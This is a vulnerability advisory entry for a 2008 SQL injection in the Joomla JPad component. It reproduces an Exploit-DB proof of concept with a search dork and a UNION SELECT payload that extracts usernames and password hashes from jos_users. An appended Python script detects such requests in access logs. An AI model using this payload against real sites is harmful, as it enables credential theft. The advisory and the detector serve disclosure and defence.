Vendor: JPad
By: His0k4
CVSS: 7.5 HIGH
Remote SQL Injection
CWE: 89
Product Name: JPad
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:vandersluijs.nl:jpad:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component JPad Remote SQL Injection

A remote SQL injection vulnerability exists in Joomla Component JPad. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the application.
Source

Exploit-DB raw data:

#########################################################
#							#
#     Joomla Component JPad Remote SQL Injection	#
#							#
#########################################################

########################################

[*] Found by : His0k4 (Algerian HaCkeR);
[*] Contact: His0k4[at]gmail.com
[*] Greetz : All friends & muslims HaCkeRs  :) 

########################################

[*] Script_Name: "Joomla"
[*] Component_Name: "JPad"


########################################

[*] DORK: allinurl:com_jpad

########################################

[*] P.O.C: /index.php?option=com_jpad&task=edit&Itemid=39&cid=[SQL]
[*] Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--
[*] Note: You have to register an account on the site.
########################################

side note:
  <name>JPad</name>
  <creationDate>31/06/2007</creationDate>
  <author>Theo van der Sluijs</author>
  <copyright>(c) 2007 VanderSluijs.nl</copyright>
  <authorEmail>theo@vandersluijs.nl</authorEmail>

  <authorUrl>www.vandersluijs.nl</authorUrl>
  <version>1.0</version>
  <description>Component to create notepad files. (see about)</description>

# milw0rm.com [2008-04-24]
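
Added example, not part of the original advisory or of the JPad code: a log review script that flags requests to com_jpad whose cid value is not a plain integer, which is how the injection described above shows up in a web server access log. The log lines are constructed samples, the function name is hypothetical, and the rule that a legitimate cid is a non-negative integer is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not from a real site.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Apr/2008:10:01:02 +0000] "GET /index.php?option=com_jpad&task=edit&Itemid=39&cid=12 HTTP/1.1" 200 5120
203.0.113.9 - - [24/Apr/2008:10:03:44 +0000] "GET /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1%20UNION%20ALL%20SELECT%201,2,3 HTTP/1.1" 200 6011
203.0.113.9 - - [24/Apr/2008:10:04:10 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 9000
203.0.113.7 - - [24/Apr/2008:10:05:31 +0000] "GET /index.php?option=com_jpad&task=edit&cid=4%27 HTTP/1.1" 500 310
"""

# Client address, request target and status code from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+" (\d{3})')
# Assumption: a legitimate cid is a non-negative integer record id.
PLAIN_ID = re.compile(r"\d+")


def suspicious_jpad_requests(log_text):
    """Return (client, status, decoded cid) for com_jpad requests with a non-numeric cid."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        # parse_qs percent-decodes names and values, so encoded payloads are compared in clear.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_jpad" not in params.get("option", []):
            continue
        # Assumption: the id may also be sent in array form as cid[].
        for cid in params.get("cid", []) + params.get("cid[]", []):
            if not PLAIN_ID.fullmatch(cid):
                hits.append((client, int(status), cid))
    return hits


if __name__ == "__main__":
    for client, status, cid in suspicious_jpad_requests(SAMPLE_LOG):
        print(f"{client} status={status} cid={cid!r}")
```

Access logs normally record only the query string, so values sent in a POST body are not covered by this check.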